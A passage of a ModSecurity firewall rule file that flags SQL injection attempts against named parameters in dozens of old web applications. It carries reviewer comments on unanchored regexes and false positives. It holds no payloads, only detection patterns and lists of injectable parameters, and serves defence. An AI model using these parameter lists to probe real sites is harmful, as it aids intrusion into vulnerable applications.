# tx.critical_anomaly_score to tx.anomaly_score. Nothing in this run sets those
# TX variables -- presumably an earlier generic SQL injection rule does; confirm
# it is loaded and evaluated before these rules, otherwise they never match.
SecRule REQUEST_LINE "@contains /navigacija.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006662,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS LINK Content Management Server (CMS) SQL Injection Attempt -- navigacija.php IDMeniGlavni UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21464'"
SecRule &TX:'/SQL_INJECTION.*ARGS:IDMeniGlavni/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS LINK Content Management Server (CMS) SQL Injection Attempt -- navigacija.php IDMeniGlavni UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2006668) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS LINK Content Management Server (CMS) SQL Injection Attempt -- prikazInformacije.php IDStranicaPodaci UPDATE
SecRule REQUEST_LINE "@contains /prikazInformacije.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006668,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS LINK Content Management Server (CMS) SQL Injection Attempt -- prikazInformacije.php IDStranicaPodaci UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21464'"
SecRule &TX:'/SQL_INJECTION.*ARGS:IDStranicaPodaci/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS LINK Content Management Server (CMS) SQL Injection Attempt -- prikazInformacije.php IDStranicaPodaci UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2007367) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Link Exchange Lite SQL Injection Attempt -- linkslist.asp psearch UPDATE
SecRule REQUEST_LINE "@contains /linkslist.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007367,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Link Exchange Lite SQL Injection Attempt -- linkslist.asp psearch UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/452256/100/0/threaded'"
SecRule &TX:'/SQL_INJECTION.*ARGS:psearch/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Link Exchange Lite SQL Injection Attempt -- linkslist.asp psearch UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2007373) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Link Exchange Lite SQL Injection Attempt -- search.asp UPDATE
# NOTE(review): unlike its neighbours this rule does not test a named
# parameter. The chained rule applies (?i:UPDATE.+SET) to the whole
# QUERY_STRING and REQUEST_BODY, and the only other condition is the generic
# path "/search.asp". The pattern has no word boundaries, so ordinary text that
# contains both letter sequences on any search.asp page scores as critical --
# expect false positives. The chained rule also declares no t: actions of its
# own; confirm which transformations (if any) it receives, since the regex may
# otherwise be evaluated against the still-encoded value.
SecRule REQUEST_LINE "@contains /search.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007373,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Link Exchange Lite SQL Injection Attempt -- search.asp UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/452256/100/0/threaded'"
SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Link Exchange Lite SQL Injection Attempt -- search.asp UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2004414) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Links Management Application SQL Injection Attempt -- index.php lcnt UPDATE
# NOTE(review): "/index.php" is not specific to this application, so the
# attribution in msg rests entirely on the parameter name lcnt.
SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004414,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Links Management Application SQL Injection Attempt -- index.php lcnt
UPDATE',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/3416/'" SecRule &TX:'/SQL_INJECTION.*ARGS:lcnt/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Links Management Application SQL Injection Attempt -- index.php lcnt UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006478) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS LiveCMS SQL Injection Attempt -- categoria.php cid UPDATE SecRule REQUEST_LINE "@contains /categoria.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006478,rev:7,msg:'SLR: ET WEB_SPECIFIC_APPS LiveCMS SQL Injection Attempt -- categoria.php cid UPDATE',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/4082/'" SecRule &TX:'/SQL_INJECTION.*ARGS:cid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS LiveCMS SQL Injection Attempt -- categoria.php cid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005834) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS LocazoList SQL Injection Attempt -- main.asp subcatID UPDATE SecRule REQUEST_LINE "@contains /main.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005834,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS LocazoList SQL Injection Attempt -- main.asp subcatID UPDATE',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/3073/'" SecRule &TX:'/SQL_INJECTION.*ARGS:subcatID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS LocazoList SQL Injection Attempt -- main.asp subcatID UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006326) 
SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Lotfian Request For Travel SQL Injection Attempt -- ProductDetails.asp PID UPDATE SecRule REQUEST_LINE "@contains /ProductDetails.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006326,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Lotfian Request For Travel SQL Injection Attempt -- ProductDetails.asp PID UPDATE',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/2908/'" SecRule &TX:'/SQL_INJECTION.*ARGS:PID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Lotfian Request For Travel SQL Injection Attempt -- ProductDetails.asp PID UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004966) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS LushiNews SQL Injection Attempt -- comments.php id UPDATE SecRule REQUEST_LINE "@contains /comments.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004966,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS LushiNews SQL Injection Attempt -- comments.php id UPDATE',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/3287/'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS LushiNews SQL Injection Attempt -- comments.php id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004972) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS LushiWarPlaner SQL Injection Attempt -- register.php id UPDATE SecRule REQUEST_LINE "@contains /register.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004972,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS LushiWarPlaner SQL 
Injection Attempt -- register.php id UPDATE',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/3288/'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS LushiWarPlaner SQL Injection Attempt -- register.php id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005140) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MAXdev MDPro SQL Injection Attempt -- index.php startrow UPDATE SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005140,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS MAXdev MDPro SQL Injection Attempt -- index.php startrow UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22293'" SecRule &TX:'/SQL_INJECTION.*ARGS:startrow/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MAXdev MDPro SQL Injection Attempt -- index.php startrow UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005517) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MGB OpenSource Guestbook SQL Injection Attempt -- email.php id UPDATE SecRule REQUEST_LINE "@contains /email.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005517,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS MGB OpenSource Guestbook SQL Injection Attempt -- email.php id UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3141'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MGB OpenSource Guestbook SQL Injection Attempt -- email.php id 
UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2006230) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MGinternet Property Site Manager SQL Injection Attempt -- detail.asp p UPDATE
# NOTE(review): the variable-name regex /SQL_INJECTION.*ARGS:p/ has no end
# anchor, so it also matches TX entries recorded for any parameter whose name
# merely begins with "p". Combined with the generic path "/detail.asp", an
# unrelated application can be reported under this msg and receive the
# critical score. Consider anchoring the name (for example ARGS:p$) after
# checking how the TX variable names are built by the rule that sets them.
SecRule REQUEST_LINE "@contains /detail.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006230,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS MGinternet Property Site Manager SQL Injection Attempt -- detail.asp p UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21073'"
SecRule &TX:'/SQL_INJECTION.*ARGS:p/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MGinternet Property Site Manager SQL Injection Attempt -- detail.asp p UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2006236) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MGinternet Property Site Manager SQL Injection Attempt -- listings.asp l UPDATE
# NOTE(review): same unanchored-name concern as above: /SQL_INJECTION.*ARGS:l/
# matches every parameter name that begins with "l", which includes the "loc"
# parameter that a later listings.asp rule in this file targets separately, so
# one request can be scored by more than one of these rules.
SecRule REQUEST_LINE "@contains /listings.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006236,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS MGinternet Property Site Manager SQL Injection Attempt -- listings.asp l UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21073'"
SecRule &TX:'/SQL_INJECTION.*ARGS:l/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MGinternet Property Site Manager SQL Injection Attempt -- listings.asp l UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2006242) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MGinternet Property Site Manager SQL Injection Attempt -- listings.asp typ UPDATE
SecRule
REQUEST_LINE "@contains /listings.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006242,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS MGinternet Property Site Manager SQL Injection Attempt -- listings.asp typ UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21073'" SecRule &TX:'/SQL_INJECTION.*ARGS:typ/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MGinternet Property Site Manager SQL Injection Attempt -- listings.asp typ UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006248) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MGinternet Property Site Manager SQL Injection Attempt -- listings.asp loc UPDATE SecRule REQUEST_LINE "@contains /listings.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006248,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS MGinternet Property Site Manager SQL Injection Attempt -- listings.asp loc UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21073'" SecRule &TX:'/SQL_INJECTION.*ARGS:loc/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MGinternet Property Site Manager SQL Injection Attempt -- listings.asp loc UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2003992) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Mambo SQL Injection Attempt -- index.php listid UPDATE SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003992,rev:7,msg:'SLR: ET WEB_SPECIFIC_APPS Mambo SQL Injection Attempt -- index.php listid 
UPDATE',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/3944/'" SecRule &TX:'/SQL_INJECTION.*ARGS:listid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Mambo SQL Injection Attempt -- index.php listid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004432) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Mambo SQL Injection Attempt -- moscomment.php mcname UPDATE SecRule REQUEST_LINE "@contains /moscomment.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004432,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Mambo SQL Injection Attempt -- moscomment.php mcname UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/20650'" SecRule &TX:'/SQL_INJECTION.*ARGS:mcname/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Mambo SQL Injection Attempt -- moscomment.php mcname UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004438) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Mambo SQL Injection Attempt -- com_comment.php mcname UPDATE SecRule REQUEST_LINE "@contains /com_comment.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004438,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Mambo SQL Injection Attempt -- com_comment.php mcname UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/20650'" SecRule &TX:'/SQL_INJECTION.*ARGS:mcname/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Mambo SQL Injection Attempt -- com_comment.php mcname UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004771) SpiderLabs 
Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Mambo LaiThai SQL Injection Attempt -- mambo.php UPDATE
# NOTE(review): this rule does not test a named parameter. The chained rule
# applies (?i:UPDATE.+SET) to the whole QUERY_STRING and REQUEST_BODY and
# declares no t: actions of its own; the pattern has no word boundaries, so
# unrelated text containing both letter sequences matches as well. Confirm
# which transformations the chained rule receives and review for false
# positives before relying on the critical score it adds.
SecRule REQUEST_LINE "@contains /includes/mambo.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004771,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Mambo LaiThai SQL Injection Attempt -- mambo.php UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/20413'"
SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Mambo LaiThai SQL Injection Attempt -- mambo.php UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2011095) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Manage Engine Service Desk Plus WorkOrder.do UPDATE SET SQL Injection Attempt
# NOTE(review): three-link chain: path, then request line contains "GET ",
# then a TX count for parameter woID. The middle link limits coverage to
# request lines containing "GET "; confirm that WorkOrder.do does not accept
# woID with other methods, otherwise that link narrows the rule more than
# intended. The msg says "UPDATE SET", but no link in the chain tests for those
# keywords, and the rule carries no reference tag (url or cve) for triage.
SecRule REQUEST_LINE "@contains /WorkOrder.do" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011095,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Manage Engine Service Desk Plus WorkOrder.do UPDATE SET SQL Injection Attempt',tag:'web-application-attack'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule &TX:'/SQL_INJECTION.*ARGS:woID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Manage Engine Service Desk Plus WorkOrder.do UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2005146) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Martyn Kilbryde Newsposter Script SQL Injection Attempt -- news_page.asp uid UPDATE
SecRule REQUEST_LINE "@contains /news_page.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005146,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Martyn Kilbryde Newsposter Script SQL Injection Attempt -- news_page.asp uid UPDATE',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/3194/'"
SecRule &TX:'/SQL_INJECTION.*ARGS:uid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Martyn Kilbryde Newsposter Script SQL Injection Attempt -- news_page.asp uid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2004270) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Koan Software Mega Mall SQL Injection Attempt -- product_review.php x UPDATE
# NOTE(review): this is the first of several Mega Mall rules that share the
# path test "/product_review.php".
#  - 2004270 and 2004294 carry the same msg text ("product_review.php x
#    UPDATE"); alerts from the two can only be told apart by rule id.
#  - In 2004270 the links that test "x[" and (?i:UPDATE.+SET) declare no t:
#    actions of their own; confirm which transformations they receive, since
#    both may otherwise be compared with the still-encoded request.
#  - The variable-name regexes for the short parameters (t, sk, x, so) have no
#    end anchor, so each also matches any parameter name that begins with those
#    letters (constructed example: a parameter named "sort" satisfies ARGS:so).
#    Because each rule adds tx.critical_anomaly_score, overlapping matches on
#    one request inflate the anomaly score; consider anchoring the names.
SecRule REQUEST_LINE "@contains /product_review.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004270,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Koan Software Mega Mall SQL Injection Attempt -- product_review.php x UPDATE',tag:'web-application-attack',tag:'cve,CVE-2006-7171'"
SecRule REQUEST_LINE "@contains x[" "chain"
SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Koan Software Mega Mall SQL Injection Attempt -- product_review.php x UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2004276) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Koan Software Mega Mall SQL Injection Attempt -- product_review.php t UPDATE
SecRule REQUEST_LINE "@contains /product_review.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004276,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Koan Software Mega Mall SQL Injection Attempt -- product_review.php t UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21072'"
SecRule &TX:'/SQL_INJECTION.*ARGS:t/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Koan Software Mega Mall SQL Injection Attempt -- product_review.php t UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2004282) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Koan Software Mega Mall SQL Injection Attempt -- product_review.php productId UPDATE
SecRule REQUEST_LINE "@contains /product_review.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004282,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Koan Software Mega Mall SQL Injection Attempt -- product_review.php productId UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21072'"
SecRule &TX:'/SQL_INJECTION.*ARGS:productId/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Koan Software Mega Mall SQL Injection Attempt -- product_review.php productId UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2004288) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Koan Software Mega Mall SQL Injection Attempt -- product_review.php sk UPDATE
SecRule REQUEST_LINE "@contains /product_review.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004288,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Koan Software Mega Mall SQL Injection Attempt -- product_review.php sk UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21072'"
SecRule &TX:'/SQL_INJECTION.*ARGS:sk/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Koan Software Mega Mall SQL Injection Attempt -- product_review.php sk UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2004294) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Koan Software Mega Mall SQL Injection Attempt -- product_review.php x UPDATE
SecRule REQUEST_LINE "@contains /product_review.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004294,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Koan Software Mega Mall SQL Injection Attempt -- product_review.php x UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21072'"
SecRule &TX:'/SQL_INJECTION.*ARGS:x/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Koan Software Mega Mall SQL Injection Attempt -- product_review.php x UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2004300) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Koan Software Mega Mall SQL Injection Attempt -- product_review.php so UPDATE
SecRule REQUEST_LINE "@contains /product_review.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004300,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Koan Software Mega Mall SQL Injection Attempt -- product_review.php so UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21072'"
SecRule &TX:'/SQL_INJECTION.*ARGS:so/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Koan Software Mega Mall SQL Injection Attempt -- product_review.php so UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2004306) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Koan Software Mega Mall SQL Injection Attempt -- order-track.php orderNo UPDATE
SecRule REQUEST_LINE "@contains /order-track.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004306,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Koan Software Mega Mall SQL
